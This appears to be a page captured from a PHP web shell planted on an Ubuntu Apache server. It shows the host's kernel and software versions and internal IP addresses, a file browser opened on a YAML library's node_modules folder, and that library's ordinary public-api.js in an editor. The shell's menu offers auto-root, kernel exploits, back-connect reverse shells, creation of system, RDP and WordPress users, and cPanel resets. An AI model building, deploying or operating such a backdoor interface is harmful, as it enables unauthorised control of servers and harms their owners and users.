Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cqt /
node_modules /
yaml /
dist /
[ HOME SHELL ]
Name
Size
Permission
Action
compose
[ DIR ]
drwxr-xr-x
doc
[ DIR ]
drwxr-xr-x
nodes
[ DIR ]
drwxr-xr-x
parse
[ DIR ]
drwxr-xr-x
schema
[ DIR ]
drwxr-xr-x
stringify
[ DIR ]
drwxr-xr-x
cli.d.ts
1.17
KB
-rw-r--r--
cli.mjs
7.17
KB
-rw-r--r--
errors.d.ts
1.21
KB
-rw-r--r--
errors.js
2.07
KB
-rw-r--r--
index.d.ts
1.31
KB
-rw-r--r--
index.js
1.73
KB
-rw-r--r--
log.d.ts
226
B
-rw-r--r--
log.js
421
B
-rw-r--r--
options.d.ts
10.76
KB
-rw-r--r--
public-api.d.ts
2.77
KB
-rw-r--r--
public-api.js
4.09
KB
-rw-r--r--
test-events.d.ts
96
B
-rw-r--r--
test-events.js
4.17
KB
-rw-r--r--
util.d.ts
709
B
-rw-r--r--
util.js
1008
B
-rw-r--r--
visit.d.ts
4.95
KB
-rw-r--r--
visit.js
9.04
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : public-api.js
'use strict'; var composer = require('./compose/composer.js'); var Document = require('./doc/Document.js'); var errors = require('./errors.js'); var log = require('./log.js'); var identity = require('./nodes/identity.js'); var lineCounter = require('./parse/line-counter.js'); var parser = require('./parse/parser.js'); function parseOptions(options) { const prettyErrors = options.prettyErrors !== false; const lineCounter$1 = options.lineCounter || (prettyErrors && new lineCounter.LineCounter()) || null; return { lineCounter: lineCounter$1, prettyErrors }; } /** * Parse the input as a stream of YAML documents. * * Documents should be separated from each other by `...` or `---` marker lines. * * @returns If an empty `docs` array is returned, it will be of type * EmptyStream and contain additional stream information. In * TypeScript, you should use `'empty' in docs` as a type guard for it. */ function parseAllDocuments(source, options = {}) { const { lineCounter, prettyErrors } = parseOptions(options); const parser$1 = new parser.Parser(lineCounter?.addNewLine); const composer$1 = new composer.Composer(options); const docs = Array.from(composer$1.compose(parser$1.parse(source))); if (prettyErrors && lineCounter) for (const doc of docs) { doc.errors.forEach(errors.prettifyError(source, lineCounter)); doc.warnings.forEach(errors.prettifyError(source, lineCounter)); } if (docs.length > 0) return docs; return Object.assign([], { empty: true }, composer$1.streamInfo()); } /** Parse an input string into a single YAML.Document */ function parseDocument(source, options = {}) { const { lineCounter, prettyErrors } = parseOptions(options); const parser$1 = new parser.Parser(lineCounter?.addNewLine); const composer$1 = new composer.Composer(options); // `doc` is always set by compose.end(true) at the very latest let doc = null; for (const _doc of composer$1.compose(parser$1.parse(source), true, source.length)) { if (!doc) doc = _doc; else if (doc.options.logLevel !== 'silent') { doc.errors.push(new errors.YAMLParseError(_doc.range.slice(0, 2), 'MULTIPLE_DOCS', 'Source contains multiple documents; please use YAML.parseAllDocuments()')); break; } } if (prettyErrors && lineCounter) { doc.errors.forEach(errors.prettifyError(source, lineCounter)); doc.warnings.forEach(errors.prettifyError(source, lineCounter)); } return doc; } function parse(src, reviver, options) { let _reviver = undefined; if (typeof reviver === 'function') { _reviver = reviver; } else if (options === undefined && reviver && typeof reviver === 'object') { options = reviver; } const doc = parseDocument(src, options); if (!doc) return null; doc.warnings.forEach(warning => log.warn(doc.options.logLevel, warning)); if (doc.errors.length > 0) { if (doc.options.logLevel !== 'silent') throw doc.errors[0]; else doc.errors = []; } return doc.toJS(Object.assign({ reviver: _reviver }, options)); } function stringify(value, replacer, options) { let _replacer = null; if (typeof replacer === 'function' || Array.isArray(replacer)) { _replacer = replacer; } else if (options === undefined && replacer) { options = replacer; } if (typeof options === 'string') options = options.length; if (typeof options === 'number') { const indent = Math.round(options); options = indent < 1 ? undefined : indent > 8 ? { indent: 8 } : { indent }; } if (value === undefined) { const { keepUndefined } = options ?? replacer ?? {}; if (!keepUndefined) return undefined; } if (identity.isDocument(value) && !_replacer) return value.toString(options); return new Document.Document(value, _replacer, options).toString(options); } exports.parse = parse; exports.parseAllDocuments = parseAllDocuments; exports.parseDocument = parseDocument; exports.stringify = stringify;
Close